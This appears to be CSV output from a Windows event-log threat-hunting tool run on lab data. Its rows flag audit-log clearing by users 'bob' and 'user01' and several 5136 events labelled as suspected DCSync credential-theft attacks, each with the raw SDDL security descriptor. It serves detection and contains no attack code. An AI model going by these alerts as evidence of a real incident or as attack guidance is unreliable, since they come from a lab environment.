cleared,1553038508.786016,2019-03-20T03:35:08.786016+04:00,,Audit,Critical,Audit log cleared by user ( user01 ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 452811 + + + + + Security + PC01.example.corp + + + + + + S-1-5-21-1587066498-1489273250-1035260531-1106 + user01 + EXAMPLE + 0x17dad + + +",PC01.example.corp,Security +Audit log cleared,1553549315.405631,2019-03-26T01:28:35.405631+04:00,,Audit,Critical,Audit log cleared by user ( bob ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 198242566 + + + + + Security + DC1.insecurebank.local + + + + + + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x8d7099 + + +",DC1.insecurebank.local,Security +Dcsync Attack detected,1553549325.02663,2019-03-26T01:28:45.026630+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242602 + + + + + Security + DC1.insecurebank.local + + + + + 98E50F6A-AE61-4BFF-A9F0-CCFA5CCB555C + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14675 + +",DC1.insecurebank.local,Security +Audit log cleared,1573805956.102509,2019-11-15T12:19:16.102509+04:00,,Audit,Critical,Audit log cleared by user ( bob ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 25048 + + + + + Security + alice.insecurebank.local + + + + + + S-1-5-21-1005675359-741490361-30848483-1108 + bob + insecurebank + 0x1c363a4 + + +",alice.insecurebank.local,Security +Dcsync Attack detected,1553549325.02663,2019-03-26T01:28:45.026630+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242601 + + + + + Security + DC1.insecurebank.local + + + + + 8E6BE6CD-81E7-4C8C-8EB0-50CA85B4950C + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14674 + +",DC1.insecurebank.local,Security +Dcsync Attack detected,1553549325.025627,2019-03-26T01:28:45.025627+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242600 + + + + + Security + DC1.insecurebank.local + + + + + 8E6BE6CD-81E7-4C8C-8EB0-50CA85B4950C + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14675 + +",DC1.insecurebank.local,Security +Dcsync Attack detected,1553549325.025627,2019-03-26T01:28:45.025627+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242599 + + + + + Security + DC1.insecurebank.local + + + + + 77B63738-C25C-4FBD-BA96-A7ABE17A22A3 + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14674 + +",DC1.insecurebank.local,Security +Dcsync Attack detected,1553549325.025627,2019-03-26T01:28:45.025627+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242598 + + + + + Security + DC1.insecurebank.local + + + + + 77B63738-C25C-4FBD-BA96-A7ABE17A22A3 + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b